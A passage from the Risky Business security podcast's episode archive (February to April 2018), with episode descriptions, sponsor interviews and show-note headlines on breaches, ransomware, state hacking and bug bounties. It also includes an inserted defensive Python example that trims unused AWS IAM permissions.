Using Hardware Token-based 2FA with the WebAuthn API – Mozilla Hacks – the Web developer blog
Trying Out Web Authentication (WebAuthn)
Web Authentication: What It Is and What It Means for Passwords | Duo Security

Risky Business #493 -- SWIFT, pipeline attacks, Chrome's AV feature and more

Apr 4, 2018


This week’s show is just the news segment and sponsor interview. But, as always, there’s plenty to discuss with our news guest Adam Boileau!

In this week’s sponsor interview we’ll be hearing from Timothy Keeler from Remediant.

Remediant is a small but growing company that does privileged account management stuff, but they’re not a password vault. Tim’s joining us this week to walk through some of the challenges of managing privileged access in devops environments and also to talk a bit about some of the challenges around single sign on and privilege management. It’s all good stuff, and it’s coming up after the news.

Links to all the news items are below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Show notes
Philippine’s financial institutions cautioned after Malaysia Central Bank counters cyber attack
Major U.S. pipeline disrupted by cyberattack on transaction software
The Under Armour Hack Was Even Worse Than It Had To Be | WIRED
Leaks Millions of Customer Records — Krebs on Security
Baltimore’s 911 system, Boeing join Atlanta in week of crypto-malware outbreaks | Ars Technica
Authenticity Matters: The IRA Has No Place on Facebook | Facebook Newsroom
Chrome Is Scanning Files on Your Computer, and People Are Freaking Out - Motherboard
The Pentagon's latest bug bounty target is its travel booking system
Georgia Senate Passes Bill That Criminalizes Unauthorized Pen-Tests
Alleged NSA leaker seeks to subpoena major cybersecurity companies, intel agencies
John Bolton, cyber warrior - POLITICO
Two founders of cryptocurrency offering arrested, charged with fraud | Ars Technica
MITRE Offers ATT&CK-Based Evaluations of Post-Exploit Detection Products | The MITRE Corporation
Extradited Russian pleads not guilty to massive LinkedIn breach
Lizard Squad's '@fbiarelosers' hacker gets smaller sentence for helping FBI arrest his friends
The fear over WannaCry is still very real
Tor Project Discontinues Tor Messenger After Only 2.5 Years
macOS High Sierra Logs Encryption Passwords in Plaintext for APFS External Drives
Section 301 FINAL.PDF
Success Story - Remediant

Risky Biz Soap Box: Network detection is dead! Long live network detection!

Apr 2, 2018


This Soap Box edition is brought to you by ICEBRG.

ICEBRG is in the business of network-based response and detection. In simple terms they drop a box on your network that strips network metadata and shunts it up to their cloud for analysis. This allows incident responders in particular to really, really speed up their investigations. We know that a lot of internet traffic is encrypted these days, and that’s made some people take their eye off the network ball. The focus and buzz these days is very much on endpoint detection and response. Our guest on this edition of Soap Box, ICEBRG’s VP of Strategic Partnerships Jason Rebholz, thinks we’ve wound up with a blind spot as a result.

It’s true that a lot of network security tech fell behind the times, but there are some fresh approaches emerging these days that are pretty bloody useful. ICEBRG started off as a product to accelerate incident response; an example use case is deploying it in 15 minutes when you’re starting an IR job, and it gives you amazing visibility for the time invested. But they’re broadening the product a bit these days. They’re not turning it into an IDS, but they’re able to give clients some very, very high quality signalling. I think this is what you get when you get a bunch of ex-govvies and incident responders together and they develop a product. Their alerts are more along the lines of “you’re owned by this APT group”, not so much “hmm, that’s some strange ICMP traffic hitting your mail server. Maybe some router in Azerbaijan needs a reboot.”

So the thinking is definitely fresh, and I’m increasingly seeing companies play in the network security space again. Network detection is dead! Long live network detection!

Show notes
ICEBRG, Inc.

Risky Business #492 -- Thomas Rid on sloppy active measures

Mar 29, 2018


Sorry this week’s show is late – I found myself taking an unexpected and unavoidable trip. But I’m back on deck and we’ve got a great show for you this week.

This week we hear from Thomas Rid, Professor of Strategic Studies at Johns Hopkins University’s School of Advanced International Studies. We’re having a conversation inspired by the latest spectacular Russian intelligence blunder: a Russian SIGINT operator exposing their GRU headquarters’ IP address because they forgot to fire up their VPN when logging in to their Guccifer 2.0 persona accounts. Oops.

It’s hilarious stuff, but it’s brought out the conspiracy types who are saying hey, as if they’d make this mistake. Something’s fishy! Well, as you’ll hear, these types of agencies make similar mistakes on a pretty routine basis. Thomas joins us to talk about that, and also about how mistakes like this don’t really matter in the broad scheme of things. They’re a bit of a distraction.

This week’s show is brought to you by Bugcrowd, the managed bug bounty company. Bugcrowd’s founder and CTO Casey Ellis will be dropping by to talk about a few things. They’ve raised a stack of cash since we last spoke and they plan to spend it on a bunch of stuff – they’re working on doing more efficient triage and they’re also looking at creating better legal agreements between their customers and their researchers. That’s all interesting stuff, and it’s coming up later.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
A cyberattack hobbles Atlanta, and security experts shudder
City of Atlanta still crippled six days after ransomware attack - CNN
Boeing hit by WannaCry virus, fears it could cripple some jet production | The Seattle Times
EXCLUSIVE: ‘Lone DNC Hacker’ Guccifer 2.0 Slipped Up and Revealed He Was a Russian Intelligence Officer
Guccifer 2.0 Was Always Sloppy - Motherboard
Facebook denies it collects call and SMS data from phones without permission | TechCrunch
Facebook Wants Security Researchers to Hunt Down Apps That Misuse User Data
Report: Kaspersky Lab to open new data center in Switzerland to curb espionage suspicions
Eugene Kaspersky defends publishing 'Slingshot' report
US Charges Nine Iranians With Hacking Over 300 Universities
Iranian Hackers Charged Last Week Were Actually Pretty Damn Good Phishers
US Congress Passes CLOUD Act Hidden in Budget Spending Bill
CLOUD Act, Tucked Into Omnibus, Likely To Derail Supreme Court Tech Privacy Case : NPR
Four Alleged Associates of Sinaloa Cartel-Linked Encrypted Phone Company Are On the Run - Motherboard
Secure Phone Companies Clamp Down After Sinaloa Cartel-Linked Arrest - Motherboard
UK police mobile device extraction tech raises eyebrows, study
FBI Barely Tried to Hack San Bernardino iPhone Before Going to Court With Apple - Motherboard
FBI has a unit solely devoted to its 'going dark' problem
zeynep tufekci on Twitter: "That @theintercept story about Facebook used by ICE to track immigrants that went pretty viral? It wasn't an immigrant. It was a legal subpoena on a child exploitation/abuse case. (Incredible correction at the end!!!) Motivated reasoning isn't just a right-wing phenomenon. 1/x…"
Minneapolis FBI agent charged with leaking classified information to reporter | Minnesota Public Radio News
How security alerts are keeping your code safer | The GitHub Blog
Ecuador Cut Off Julian Assange’s Internet For His Political Tirades on Twitter - Motherboard
Reddit Bans Subreddits Dedicated to Dark Web Drug Markets and Selling Guns - Motherboard
NSA has been tracking bitcoin users since 2013
Angry Users Donate $120K to Cancer Research After Brian Krebs' Coinhive Article
With cryptojacking rising, exploit kits rapidly decline - CyberScoop
IETF Approves TLS 1.3 as Internet Standard
Chrome Extension Detects URL Homograph (Unicode) Attacks
Drupal Fixes Drupalgeddon2 Security Flaw That Allows Hackers to Take Over Sites
Many VPN Providers Leak Customer's IP Address via WebRTC Bug
Microsoft's Meltdown patches introduced a whole new vulnerability
Cisco IOS XE Software Static Credential Vulnerability
Digital arms merchants selling products to Australian police forces? – Digital Rights Watch
fix nasty typo in CRYPTO_memcmp. · openssl/openssl@56d5a4b · GitHub
Nyotron-OilRig-Malware-Report-March-2018.pdf

Snake Oilers 5 part 2: Penten talks Honey Docs, Trend Micro on its latest

Mar 26, 2018


Snake Oilers is a wholly sponsored podcast where vendors pay to pitch their tech at you, the listeners. Last week we heard from Rapid7, Mimecast and VMRay, but this week we’ve got two more pitches for you. First up we’re going to hear from Penten, an Australian based company that is doing some genuinely interesting stuff with honey documents.

Also in this edition we’ll be chatting with the team at Trend Micro. And this isn’t really about pitching a product – they’re more here to combat messaging coming out of newer EDR companies who are portraying established vendors like them as out of touch.

As listeners would know, beating up the incumbent AV companies is one of my hobbies, so basically Trend Micro’s Eric Skinner and Eric Shulze will be along this week to tell me why I’m an idiot. They’re also going to make a strong case for independent AV testing – it’s something the industry has struggled with for a long time, but they say they want it to happen more than ever.

Show notes
Penten: Honey Docs
Endpoint Security, powered by XGen™

Risky Business #491 -- The biggest infosec news week we've ever seen

Mar 21, 2018


What a week, huh? As you’ll soon hear it’s been an absolute monster week for infosec news. Top of the list is the Cambridge Analytica scandal. For those who haven’t had time to catch up on this one, a former staffer from the data analytics firm has given some interviews in which he says the company scraped 50 million Facebook profiles and used that data to target US voters with political messages on behalf of Donald Trump’s campaign. Obviously this has made people feel quite uncomfortable, everyone is mad at Facebook and it’s news everywhere.

It also looks like Facebook CSO Alex Stamos is on his way out due to events entirely unrelated to this.

Also in this week’s show we’ve got:

Iranians trying to blow up Saudi Arabian chemical plants
Americans blaming Russia for attacks on its energy grid
Kaspersky blowing LIVE SOCOM ops against Al Qaeda and the remnants of Islamic State
The UK vowing to exact revenge on Russia via “cyber” retaliation over the Skripal affair

There is no feature interview in this week’s show, we’re going long on news, but this week’s sponsor interview is absolutely fantastic. It’s with Haroon Meer, head honcho over at Thinkst Canary.

He’s not here to talk about anything really related to products this week, instead we’re going to talk about CISO stuff. He’ll be thoughtlording the absolute sh*t out of you all this week.

Haroon thinks breached organisations are getting off too lightly in the current infosec climate because people are scared to victim shame. As you’ll hear, he thinks there are just no excuses for how some high profile data breaches have occurred, and says more CSOs should be prepared to die on the right hills to stop their companies engaging in straight up suicidal behaviour. It’s great for security to be an enabler, but that doesn’t mean signing off on whatever anyone wants to do.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
How Trump Consultants Exploited the Facebook Data of Millions - The New York Times
Ron Wyden on Twitter: "I wrote a letter to Mark Zuckerberg asking @facebook to detail the extent of misuse of its users’ private information:…"
Revealed: Trump’s election consultants filmed saying they use bribes and sex workers to entrap politicians – Channel 4 News
Facebook told to pull auditors from Cambridge Analytica’s offices
Cambridge Analytica CEO Alexander Nix Suspended Amid Scandals | WIRED
Facebook Exit Hints at Dissent on Handling of Russian Trolls - The New York Times
Nicole Perlroth on Twitter: "Full story publishing soon. Despite this PR-approved tweet, Stamos told hire ups he plans to leave FB in August. For the next few months, his role has been relegated to managing a small red team in SF, transitioning his group over to Guy Rosen and Pedro Canahuati, and tweeting.…"
Facebook security chief Alex Stamos leaked audiotape
A Cyberattack in Saudi Arabia Had a Deadly Goal. Experts Fear Another Try. - The New York Times
In a first, U.S. blames Russia for cyber attacks on energy grid
Russian spy attack: how likely is a British cyber offensive against Putin's regime?
Adrian Lamo, ‘Homeless Hacker’ Who Turned in Chelsea Manning, Dead at 37 — Krebs on Security
Kaspersky's 'Slingshot' report burned an ISIS-focused intelligence operation
Telegram loses appeal over encryption keys in Russia
Communications network of choice for Australian criminals shut down
Child abuse imagery found within bitcoin's blockchain | Technology | The Guardian
FBI raids home of suspected spy agency leaker - CNN
Svitzer employee details stolen in data breach affecting almost half of its Australian employees - ABC News (Australian Broadcasting Corporation)
Safari, Microsoft Edge exploits earn hackers $162k at Pwn2Own
China Bans People With Low "Social Credit" From Planes and Trains

Snake Oilers #5 part 1: Rapid7 Insight Phish, VMRay's updated platform and mail filtering with Mimecast

Mar 19, 2018


As most of you know this isn’t the regular weekly show, this is a special edition we publish four times a year, and as you may have guessed from the title, this is the Risky Business podcast where vendors pay for time to pitch their products to you, the listeners.

And we’ve actually got some great pitches for you today. We’ll be hearing from Rapid7 first – they’ve developed a new addition to their Insight platform – Insight Phish. There are already so many phishing simulation tools out there, so we’ll hear from Justin Buchanan on why Rapid7 has gone down this path. He actually makes a pretty compelling argument on why they’ve bothered. Simulation is just one part of Insight Phish, the other part is response.

They’ve kind of closed the loop on that, so if you’re already a Rapid7 customer you’ll probably be VERY interested in Insight Phish. And even if you’re not it might get you looking at their stuff!

Then we’re going to hear from the team at VMRay. VMRay makes a cloud-based binary analyser for all you DFIR types. They’re a German company founded on the back of the founder’s PhD. They actually raised millions of dollars in funding in 2016 from German investors. I know I want to hear from any company that convinced Germans to invest large sums of money! They’ve released a new version of their product and they’ll be telling us a bit about that.

And finally we’re going to hear from Mimecast. And you know what? Mail filtering is a hard thing to pitch – most of the functionality is completely opaque to the user. So the Mimecast team will be along in our final pitch of the day to explain to you all what you should be asking of your email filtering provider. It’s actually really good generic advice… surprisingly neutral advice, too, so stick around for that!

Links to all our sweet, sweet Snake Oiler offerings are below!

Show notes
Phishing Simulation Tool: InsightPhish | Rapid7
Get Hands on with VMRay Analyzer | VMRay
Email Cloud Services in Security & Archiving | Mimecast

Risky Business #490 -- North Korea, "cyber norms" and diplomacy

Mar 14, 2018


On this week’s show we’re taking a look at how an acceleration in 24-carat bonkers state-sponsored hacking is leading to calls at senior levels of government for some actual norms to be established. We’ve got Russia hacking the planet with NotPetya, North Korea owning central banks and cryptocurrency exchanges, China owning the CCleaner supply chain and… well… it’s all getting a bit much.

So in this week’s feature segment we’re going to zero in on one norm-breaking country, North Korea. We’ll hear from John Hultquist of FireEye and Adam Meyers of Crowdstrike on that.

As you’ll hear, countries like North Korea are pushing the limits of what they can get away with on the Internet and friendlier states are desperately trying to establish what the boundaries for good faith actors should actually be. We’ll hear from Australia’s cyber ambassador Tobias Feakin on that part of the discussion, courtesy of some audio gifted to the Risky Business podcast by Australian journalist James Riley. That’s a fun package and it’s coming up after the news.

This week’s sponsor interview is with Zane Lackey of Signal Sciences. Zane joins us to talk about a few things – how developer teams are increasingly making their own security decisions and how that’s actually a good thing… we’ll also talk about companies that have found themselves operating on multiple cloud platforms even though they didn’t plan for it.

Adam Boileau, as usual, is this week’s news guest.

We cover:

The AMD bugs
China’s tightening grip on security research
Slingshot APT
Christopher Wray’s mind bogglingly daffy comments on key escrow
AND MOAR!

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
AMD allegedly has its own Spectre-like security flaws
China's government is keeping its security researchers from attending conferences
China's national vulnerability database is merely a tool for its intelligence agencies
China and Vulnerability Research – the grugq – Medium
Cyber-enabled information and influence operations—it’s not just Russia | The Strategist
How Dutch Police Took Over Hansa, a Top Dark Web Market | WIRED
Crypto Exchange Offers a $250,000 Bounty for Hacker Tip-Offs - Bloomberg
Victims can sue Yahoo for massive breaches, federal judge says
Potent malware that hid for six years spread through routers | Ars Technica
ISPs inside Turkey and Egypt spread FinFisher spyware in massive espionage campaign
The FBI Director thinks this company found an answer to 'going dark'
Feds Bust CEO Allegedly Selling Custom BlackBerry Phones to Sinaloa Drug Cartel - Motherboard
'Snitches Get Stitches': How Secure Phones for Criminals Are Sold on Instagram - Motherboard
Olympic Destroyer: A False Flag Confusion Bomb | Threatpost | The first stop for security news
Revenge Porn Moves to Slack - Motherboard
CCleaner Attackers Intended To Deploy Keylogger In Third Stage | Threatpost | The first stop for security news
Title
Let’s Encrypt takes free “wildcard” certificates live | Ars Technica
Samba Patches Two Critical Vulnerabilities in Server Software | Threatpost | The first stop for security news
Cisco Prime Collaboration Provisioning Hard-Coded Password Vulnerability
Any.Run - An Interactive Malware Analysis Tool - Is Now Open To The Public
Tobias Feakin, Cyber Ambassador
The Next-Gen Web Protection Platform - WAF And RASP | Signal Sciences

Risky Business #489 -- (Deep) Fake News

Mar 7, 2018


On this week’s show we’re chatting with Professor of Law at the University of Maryland Danielle Citron about an article she co-authored on so-called “deep fake” videos. Citron and Bobby Chesney wrote a fascinating piece about the privacy and national security implications of this latest trend and we’ll be talking to her about that a little bit later on.

In this week’s sponsor interview we’re chatting with Julian Fay, CTO of this week’s sponsor Senetas. We talk to him about how the encryption hardware industry is responding to the looming spectre of quantum computing.

As you’ll hear, standards bodies are already rolling out draft implementations of quantum-resistant algorithms that companies like Senetas will be baking into their kit as additional layers of protection.

Adam Boileau, as usual, is this week’s news guest.

We cover:

Massive memcached DDoS attacks
Trustico having a bad week
Reported flaws in 4G/LTE
Uber breach lawsuit
…and more!

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
NETSCOUT Arbor Confirms 1.7 Tbps DDoS Attack; The Terabit Attack Era Is Upon Us
A 1.3-Tbs DDoS Hit GitHub, the Largest Yet Recorded | WIRED
Trustico website goes dark after someone drops critical flaw on Twitter | Ars Technica
23,000 HTTPS certificates axed after CEO emails private keys | Ars Technica
How do you handle mass revocation requests? - Google Groups
LTE security flaws could be used for spying, spreading chaos | Ars Technica
Angry Coinbase users sue over claimed security failings, insider trading | Ars Technica
Chrome's WebUSB Feature Leaves Some Yubikeys Vulnerable to Attack | WIRED
Pennsylvania Sues Uber Over Data Breach Disclosure | WIRED
Infamous Russian Cyber-Espionage Group Hacks German Government
Nuance Communications says NotPetya attack has cost it $92 million since June
China’s Cyber Militias | The Diplomat
the grugq on Twitter: "What happens when 80% of the reporter’s of Android bugs and half the MSFT top 100 researchers go radio silent? This will be interesting. VEP that...…"
Big banks want to weaken the internet’s underlying security protocol
Vulnerability Affects Half of the Internet's Email Servers
Researchers Find 34,200 Vulnerable Ethereum Smart Contracts
POS Malware Found at 160 Applebee's Restaurant Locations | Threatpost | The first stop for security news
Thomas Rid on Twitter: "Today DHS published a remarkable 2016 FOUO document: network infrastructure devices *in US gov federal agencies* (ie Cisco routers) have been "the attack-vector of choice for advanced threat actors"—for several years. And between the lines: the attackers sometimes succeeded."
Mobile Security Updates: Understanding the Issues
Deep Fakes: A Looming Crisis for National Security, Democracy and Privacy? - Lawfare
Google Unveils Largest Quantum Computer Yet, but So What?
A Methodology for Quantum Risk Assessment - Global Risk Institute : Global Risk Institute
Get Hands on with VMRay Analyzer | VMRay
Bringing agility to cryptography - Senetas

Risky Biz Soap Box: Alphabet Chronicle co-founder Mike Wiacek talks Virus Total Intelligence

Mar 2, 2018


This isn’t the regular weekly show; Soap Box is the podcast where vendors pay to appear to talk about big picture stuff, or really anything they want.

Unless you’ve been living under a rock lately you’d know that Google’s parent company Alphabet announced the spinoff of an enterprise information security company. They’ve named it Chronicle, but beyond that it’s all a bit mysterious. Unlike other startups that stay super stealth until they launch their product, Alphabet basically realised that, as it already has its platform out there under beta test with a bunch of organisations, the creation of the company would eventually leak, and that would have been a mess from Alphabet’s point of view. So, their solution was to announce the company before it’s ready to ship its product.

I would love to tell you that they’re going to drop all the juicy details in this podcast but they’re not. They’ll drop some hints, but for now, Chronicle’s mystery platform will remain that: a mystery.

But that’s not to say there isn’t some other stuff to talk about. As a part of the spinoff, Virus Total is now a part of Chronicle. And you know what? There’s a lot more to Virus Total, in particular Virus Total Intelligence, than I realised. That’s partly because Alphabet hasn’t really done much marketing around it, and this is a kind of first step down that path.

So in this podcast you’re going to hear from two people from Chronicle – Rick Caccia, who is the chief marketing officer, is mostly chiming in to explain a little bit about the new company – and Mike Wiacek, the CSO and co-founder of Chronicle. He’s going to be telling us about all the features of Virus Total that you probably didn’t realise exist. Did you know if you have a VTI account you can run YARA rules against everything that comes into Virus Total? And you can apply the rules retrospectively to see what shakes out? And that they have graph and clustering features? And … and … and … you get the idea.

I hope you enjoy this podcast!

Show notes
Graduation Day: Introducing Chronicle – The Team at X
VirusTotal

Risky Business #488 -- Stop users recycling passwords with the pwned passwords API

Feb 28, 2018


On this week’s show we’ll chat with Troy Hunt of Have I Been Pwned. He’s released version two of his pwned password service and API. Basically it lets websites check to see if a user’s password is one that he has in his dataset. Version two allows this process to happen without users having to send over a complete password hash to HIBP.

It’s making some waves already. It’s a genuinely interesting, free service.

In this week’s sponsor interview we chat with Trail of Bits security engineer JP Smith about all things blockchain. Trail of Bits has gotten into blockchain stuff because, hey, we’ve all heard about the many, many security issues associated with things like Ethereum smart contracts, and when it comes to blockchain and Ethereum security, well, someone has to do it.

JP will talk us through some of the bug classes he sees, as well as the work Trail of Bits has done applying its dynamic symbolic execution tool Manticore to the Ethereum Virtual Machine.

Adam Boileau, as always, is this week’s news guest.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Cisco's Talos Intelligence Group Blog: Who Wasn’t Responsible for Olympic Destroyer? Winter Olympics hack shows how advanced groups can fake attribution Russia accused of “false flag” attack on Olympic opening | Ars Technica U.S. and U.K. blame Russia for infamous 'NotPetya' cyberattacks US grand jury indicts 13 Russian nationals for election meddling The Feds Can Now (Probably) Unlock Every iPhone Model In Existence Apple Tackles Cellebrite Unlock Claims, Sort Of | Threatpost | The first stop for security news Apple moves to store iCloud keys in China, raising human rights fears New SEC guidance: Please don't sell your stocks if you have insider info about a breach WhatsApp Co-Founder Brian Acton Injects $50 Million in Newly Formed Signal Foundation | WIRED | SEC Charges Former Bitcoin-Denominated Exchange and Operator With Fraud Kyle Torpey on Twitter: "The $10 Billion lawsuit against Craig Wright claims Wright used a computer-generated font called Otto to forge Dave Kleiman's signature and acquire hundreds of thousands of bitcoins." Australian 'bitcoin founder' Craig Wright accused of stealing billions of dollars worth of bitcoin Attorney General Sessions Announces New Cybersecurity Task Force | OPA | Department of Justice Jordan ⚡️ Eldredge on Twitter: "Holy moly. You can write a key logger in pure CSS. I wonder if @reddit custom themes would be vulnerable." US Border Agents Didn't Verify Any e-Passports Since 2007 Because They Didn't Have the Software In-the-wild DDoSes use new way to achieve unthinkable sizes | Ars Technica One-stop counterfeit certificate shops for all your malware-signing needs | Ars Technica A Hacker Has Wiped a Spyware Company’s Servers—Again - Motherboard Hacker Returns $26 Million Worth of Ethereum Back to Hacked Company Josh Pitts on Twitter: "I found this interesting code signing bug in macOS. I took the 2011/2012 flashback malware and 'signed' it with a cert from Apple. VirusTotal and WhatsYourSign (@patrickwardle's @objective_see tool) both agree that it's signed by Apple. I have some bug reporting to do... 🤓" Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security Flight Simulator Add-On Tried to Catch Pirates By Installing Password-Stealing Malware on Their Computers - Motherboard uTorrent vulnerabilities allow information disclosure and remote code execution People Are Blasting iOS 'Text Bombs' on Twitter to Crash iPhones - Motherboard Troy Hunt: I've Just Launched "Pwned Passwords" V2 With Half a Billion Passwords for Download Cybersecurity Enforcers Wake Up to Unauthorized Computer Access Via Credential Stuffing – Big Law Business Automated bugfinding for the blockchain - YouTube

Risky Biz Soap Box: Bugcrowd CTO Casey Ellis on bounty innovation, PII norms and defensive bounties

Feb 22, 2018


This edition of Soap Box is brought to you by Bugcrowd. So the next 40 minutes or so is a conversation between Bugcrowd CTO and founder Casey Ellis and me.

As most of you would know, Bugcrowd runs outsourced bug bounty programs for a wide variety of organisations, from Silicon Valley megabrands to financial services firms to development-heavy SMEs.

And what a time it is for the bug bounty business. There’s a lot of attention on the bug bounty concept at the moment – we even saw a Senate subcommittee hearing on them take place earlier this month. It’s a competitive sector, too.

In this podcast Casey tells us about a few things, like what Bugcrowd is doing to try to add some innovation to bug bounty programs. As you’ll hear, he’s actually got some really great ideas. I came into this as a bit of a sceptic, as in, how can you innovate around something as simple as a bug bounty program? It turns out you can. We also try to make the case that bug bounties are an established part of infosec now; a boring part of the mix.

So we cover off some interesting stuff Bugcrowd is doing, then we talk about how bug bounty providers might be able to actually engage their crowds in defensive work.

Risky Business #487 -- Guest Katie Moussouris on her recent Senate Subcommittee testimony

Feb 15, 2018


On this week’s show we’re going to chat with Katie Moussouris about her testimony before a Senate subcommittee last week. She fronted a hearing of the Subcommittee on Consumer Protection, Product Safety, Insurance, and Data Security titled “Data Security and Bug Bounty Programs: Lessons Learned from the Uber Breach and Security Researchers”. We’ll hear from her on how all that went and what she hopes the US government learned from the committee panel.

Also this week we’ll be hearing from Mark Maunder of Wordfence in this week’s sponsor interview. Wordfence sells a WordPress security plugin. There have been some interesting developments in the WordPress world over the last week that are definitely worth covering. WordPress pushed an update to core that disabled future automatic updates. Yikes.

We’ll find out how long that update was out, what percentage of the WordPress ecosystem swallowed it, and we’ll also talk about a couple of dysfunctional things happening in the WordPress ecosystem.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Researchers: We Found the Olympic-Disrupting Malware - Motherboard Equifax says more private data was stolen in 2017 breach than first revealed | ZDNet How a Low-Level Apple Employee Leaked Some of the iPhone's Most Sensitive Code - Motherboard That mega-vulnerability Cisco dropped is now under exploit | Ars Technica Two Bills Introduced to Ban US Government from Using Chinese Equipment Highlights of the French cybersecurity strategy Accused “In fraud we trust” kingpin arrested while vacationing in Thailand | Ars Technica U.S. Arrests 13, Charges 36 in ‘Infraud’ Cybercrime Forum Bust — Krebs on Security From July on, Chrome will brand plain old HTTP as “Not secure” | Ars Technica Critical Telegram flaw under attack disguised malware as benign images | Ars Technica Cryptocurrency Mining Hack That Compromised Thousands of Sites ‘Could Have Been a Catastrophe’ - Motherboard BitGrail Cryptocurrency Exchange Becomes Insolvent After Losing $170 Million XRballer comments on The Stolen XRB has already been Redistributed/Sold Off ‘BuckHacker’ Search Engine Lets You Easily Dig Through Exposed Amazon Servers - Motherboard How a Tiny Startup Became the Most Important Hacking Shop You’ve Never Heard Of - Motherboard European Cops Welcome Spy Vendor That Sold to Assad Regime - Motherboard Intel releases new Spectre microcode update for Skylake; other chips remain in beta | Ars Technica Expanding Intel’s Bug Bounty Program: New Side Channel Program, Increased Awards | Intel Newsroom Microsoft Rolls Out Windows Analytics Update to Aid Meltdown & Spectre Patching Microsoft February Patch Tuesday Fixes 50 Security Issues Until last week, you could pwn KDE Linux desktop with a USB stick • The Register WordPress users – do an update now, and do it by hand! – Naked Security Atlassian Security Engineering Team Lead | SmartRecruiters Atlassian Sr. Manager of Global Security Engineering | SmartRecruiters Speakers | WordCamp Atlanta 2018 Wordfence Signup - Wordfence Data Security and Bug Bounty Programs: Lessons Learned from the Uber Breach and Security Researchers - Hearings - U.S. Senate Committee On Commerce, Science, & Transportation

Risky Business #486 -- Locking down AWS permissions with RepoKid

Feb 7, 2018


On this week’s show we’re chatting with Travis McPeak at Netflix about a tool they’ve developed called RepoKid. It automatically strips unused AWS permissions, which I’m guessing a lot of you will find quite useful.
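The idea of stripping permissions a role has never exercised, reduced to a small worked example. This is added here and is not Netflix’s RepoKid code: the policy document and the set of services the role has actually been seen using are constructed for illustration (in practice that usage data would come from something like IAM Access Advisor’s per-service last-accessed records), and the function name `repo_policy` is an assumption.

```python
import copy
from typing import Dict, Iterable, List, Tuple

Policy = Dict[str, object]

# Constructed role policy for illustration; not a real Netflix or RepoKid artefact.
SAMPLE_POLICY: Policy = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Effect": "Allow", "Action": ["dynamodb:*", "sqs:SendMessage"], "Resource": "*"},
        {"Effect": "Allow", "Action": "kms:Decrypt", "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:*", "Resource": "*"},
    ],
}


def service_of(action: str) -> str:
    """'s3:GetObject' -> 's3'. A bare '*' names no service and is returned as '*'."""
    return action.split(":", 1)[0].lower() if ":" in action else "*"


def repo_policy(policy: Policy, used_services: Iterable[str]) -> Tuple[Policy, List[str]]:
    """Return (trimmed copy of the policy, list of actions removed).

    Actions belonging to a service in `used_services` are kept; the rest are
    dropped. The input policy is not modified.
    """
    used = {s.lower() for s in used_services}
    removed: List[str] = []
    kept_statements = []
    for stmt in policy["Statement"]:
        stmt = copy.deepcopy(stmt)
        # Only prune Allow statements that list explicit actions. A Deny must stay
        # (dropping it widens access), and an Allow with NotAction grants everything
        # *except* the listed actions, so trimming that list would also widen access.
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            kept_statements.append(stmt)
            continue
        actions = [stmt["Action"]] if isinstance(stmt["Action"], str) else list(stmt["Action"])
        kept = []
        for action in actions:
            svc = service_of(action)
            # A bare "*" cannot be attributed to any service: leave it for a human
            # to review rather than guess.
            if svc == "*" or svc in used:
                kept.append(action)
            else:
                removed.append(action)
        if kept:
            stmt["Action"] = kept[0] if len(kept) == 1 else kept
            kept_statements.append(stmt)
        # A statement whose every action was unused is dropped entirely.
    repoed = dict(policy)
    repoed["Statement"] = kept_statements
    return repoed, removed


if __name__ == "__main__":
    import json
    trimmed, gone = repo_policy(SAMPLE_POLICY, used_services={"s3", "sqs"})
    print("removed:", gone)
    print(json.dumps(trimmed, indent=2))
```

The two guard clauses are the part worth copying: an automated repo that touched Deny or NotAction statements would quietly grant more than the role had before, which is the opposite of the intent.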

We’ll also chat with Dan Kuykendall in this week’s sponsor interview. Dan works for Rapid7, and they’ve been doing some interesting stuff with their agents, basically tweaking them to give better visibility of application security issues and exploitation attempts. That conversation is really about how security firms these days are using the agent footprint they have to just do whatever they can.

Adam Boileau, as always, pops in to discuss the week’s news. We cover the:

AutoSploit arm waving
Lauri Love beating extradition
Nik Cubrilovic’s arrest
MOAR

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Threat or menace? “Autosploit” tool sparks fears of empowered “script kiddies” | Ars Technica Rob Joyce on Twitter: "Releasing AutoSploit, making mass exploitation even easier, was irresponsible. My friends at the FBI remind us all that while exploitation is easier, it is not any less illegal. #scriptkiddiesbeware" Lauri Love case: Hacking suspect wins extradition appeal - BBC News Young criminal hackers get assigned jobs at Dutch ICT firms | NL Times Julian Assange loses challenge to UK arrest warrant, court to rule on new bid next week - ABC News (Australian Broadcasting Corporation) Alleged Spam Kingpin ‘Severa’ Extradited to US — Krebs on Security Georgia SB 315 (The Computer Intrusion Bill) TechCrunch alumni arrested over alleged hacking of car sharing company - SiliconANGLE Trump administration wants larger role in shaping international data laws CLOUD Act Would Erode Trust in Privacy of Cloud Storage | Center for Democracy & Technology Experts push back on Trump administration's call to respond to cyberattacks with nukes Data Security and Bug Bounty Programs: Lessons Learned from the Uber Breach and Security Researchers - Hearings - U.S. Senate Committee On Commerce, Science, & Transportation Nicole Perlroth on Twitter: "Wow this Commerce Committee hearing on Uber payment is going off the rails. Blumenthal accusing Uber of aiding and abetting extortion, and a cover up. Flynn, "I agree... This is not the way we are going to do these things moving forward." Calls it "multilevel data intrusion."" Berkshire Hathaway’s Business Wire Suffers Cyberattack - WSJ Credit card ban, regulator scrutiny latest challenges for bitcoin Seoul claims North Korea stole millions worth of cryptocurrency from domestic exchanges DHS won't reverse ban on Kaspersky products, court docs show Apple, Cisco team up with cyber insurers for policy discounts Oh, banks have cameras? Two men arrested for ATM jackpotting scheme must've forgot Telegram iOS app removed from App Store last week due to child pornography | Ars Technica Hacking Team Is Still Alive Thanks to a Mysterious Investor From Saudi Arabia - Motherboard T-Mobile Is Sending a Mass Text Warning of ‘Industry-Wide’ Phone Hijacking Scam - Motherboard NSA Exploits Ported to Work on All 